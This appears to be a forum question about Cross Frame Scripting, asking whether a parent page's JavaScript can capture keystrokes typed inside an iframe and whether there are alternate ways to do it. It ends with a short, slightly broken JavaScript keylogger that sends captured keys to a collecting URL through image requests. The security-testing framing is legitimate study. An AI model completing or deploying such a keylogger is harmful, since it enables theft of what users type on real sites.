I am trying to analyze the possibility of accessing keystrokes from an iframe using a javascript running on the parent page. The potential attack which I am looking to verify is Cross Frame Scripting.
From the OWASP page, I read that the listener in parent page would get notified only if the keystroke events are from the parent page itself and not the iframe.
- Is that always the case?
- If the framed content is of same origin, would any of the browsers behave differently?
- I have confirmed on Chrome that this attack doesn't work. But is there any alternate way to perform this attack?
This is the javascript running on my parent.
var keys='';
var url = 'http://localhost:8883/key?c=';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
if(keys.length>0) {
new Image().src = url+keys;
keys = '';
}, 1000);